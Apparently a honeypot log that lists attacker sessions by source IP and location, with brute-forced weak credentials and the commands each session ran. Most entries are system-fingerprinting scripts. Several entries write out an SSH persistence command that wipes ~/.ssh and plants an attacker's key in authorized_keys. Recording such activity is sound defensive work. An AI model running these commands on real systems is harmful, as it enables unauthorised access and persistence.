-i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—5
๐ŸŽญ grumpy_lantern_root_101 (120.48.8.101) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-07-04 18:44 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ drowsy_baguette_root (94.183.188.148) โ€” Paris, France ยท 1 session ยท 2 cmds
2026-07-04 18:28 EDT ยท as oracle/oracle!@#
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ aloof_meatball_root (171.25.158.47) โ€” Vaxjo, Sweden ยท 1 session ยท 2 cmds
2026-07-04 17:58 EDT ยท as oracle/oracle@2023
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ wily_phantom_root (91.92.40.13) โ€” Varna, Bulgaria ยท 8 sessions ยท 72 cmds
2026-07-04 17:13 EDT ยท as root/1234, root/123456, root/12345678
OS fingerprinting via uname -s -v -n -m โ†’ kernel version extraction from /proc/version โ†’ OS release detection via /etc/os-release โ†’ environment path hardening โ†’ hardware profiling for resource assessment
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—8
$ uname -s -v -n -m 2 > /dev/null ร—8
$ /bin/uname -s -v -n -m 2 > /dev/null ร—8
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—8
$ busybox uname -s -v -n -m 2 > /dev/null ร—8
$ ( [ -f /proc/version ] ร—8
$ [ -f /proc/version ] ร—8
$ head -1 /proc/version | cut -d -f1 ร—8
$ [ -f /etc/os-release ] ร—8
๐ŸŽญ grumpy_dragon_root (116.177.172.94) โ€” Jinrongjie, China ยท 1 session ยท 1 cmd
2026-07-04 16:34 EDT ยท as guest/guest
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ lurking_nomad_root (195.178.110.228) โ€” Andorra la Vella, Andorra ยท 25 sessions ยท 180 cmds
2026-06-26 13:37 EDT ยท as root/1234, root/123456, root/12345678
OS fingerprinting via uname -s -v -n -m โ†’ kernel version extraction from /proc/version โ†’ OS release detection via /etc/os-release โ†’ uptime sampling โ†’ PATH environment hardening โ†’ full hardware and system profiling.
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
$ uname -s -v -n -m 2 > /dev/null ร—25
$ /bin/uname -s -v -n -m 2 > /dev/null ร—16
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—16
$ busybox uname -s -v -n -m 2 > /dev/null ร—16
$ ( [ -f /proc/version ] ร—16
$ [ -f /proc/version ] ร—16
$ head -1 /proc/version | cut -d -f1 ร—16
$ [ -f /etc/os-release ] ร—16
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—15
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—9
$ uname -m 2 > /dev/null ร—9
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—9
๐ŸŽญ ashen_bamboo_root (123.58.198.35) โ€” Ho Chi Minh City, Vietnam ยท 1 session ยท 2 cmds
2026-07-04 16:20 EDT ยท as oracle/abc123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ nocturnal_merlion_root (43.134.33.250) โ€” Singapore, Singapore ยท 1 session ยท 2 cmds
2026-07-04 16:11 EDT ยท as oracle/abc123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rabid_eagle_root (92.118.39.14) โ€” Dallas, United States ยท 12 sessions ยท 108 cmds
2026-07-01 08:03 EDT ยท as admin/123456, admin/admin123, admin/password
PATH manipulation via export โ†’ OS fingerprinting with uname -s -v -n -m โ†’ kernel version extraction from /proc/version โ†’ OS release detection via /etc/os-release โ†’ hardware profiling suppressed by redirecting output to /dev/null
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—3
$ uname -s -v -n -m 2 > /dev/null ร—12
$ /bin/uname -s -v -n -m 2 > /dev/null ร—12
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—12
$ busybox uname -s -v -n -m 2 > /dev/null ร—12
$ ( [ -f /proc/version ] ร—12
$ [ -f /proc/version ] ร—12
$ head -1 /proc/version | cut -d -f1 ร—12
$ [ -f /etc/os-release ] ร—12
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—9
๐ŸŽญ sneaky_wok_root (219.151.148.162) โ€” Chongqing, China ยท 1 session ยท 1 cmd
2026-07-04 14:01 EDT ยท as root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ silent_liberty_root_98 (99.92.204.98) โ€” Dallas, United States ยท 1 session ยท 2 cmds
2026-07-04 12:46 EDT ยท as oracle/oracle!
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ unhinged_ghost_root (91.92.40.12) โ€” Varna, Bulgaria ยท 10 sessions ยท 80 cmds
2026-06-24 10:31 EDT ยท as root/1234, root/123456, root/12345678
PATH injection via export โ†’ OS fingerprinting via uname -s -v -n -m โ†’ kernel version extraction from /proc/version โ†’ OS release detection via /etc/os-release โ†’ uptime sampling from /proc/uptime
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—6
$ uname -s -v -n -m 2 > /dev/null ร—10
$ /bin/uname -s -v -n -m 2 > /dev/null ร—8
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—8
$ busybox uname -s -v -n -m 2 > /dev/null ร—8
$ ( [ -f /proc/version ] ร—8
$ [ -f /proc/version ] ร—8
$ head -1 /proc/version | cut -d -f1 ร—8
$ [ -f /etc/os-release ] ร—8
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output" ร—2
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—2
$ uname -m 2 > /dev/null ร—2
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—2
๐ŸŽญ lurking_rogue_root (195.178.110.217) โ€” Andorra la Vella, Andorra ยท 12 sessions ยท 78 cmds
2026-06-24 20:25 EDT ยท as root/1234, root/123456, root/12345678
OS fingerprinting via uname -s -v -n -m โ†’ kernel version extraction from /proc/version โ†’ OS identification via /etc/os-release โ†’ uptime sampling โ†’ PATH environment hardening โ†’ reconnaissance completion without payload execution
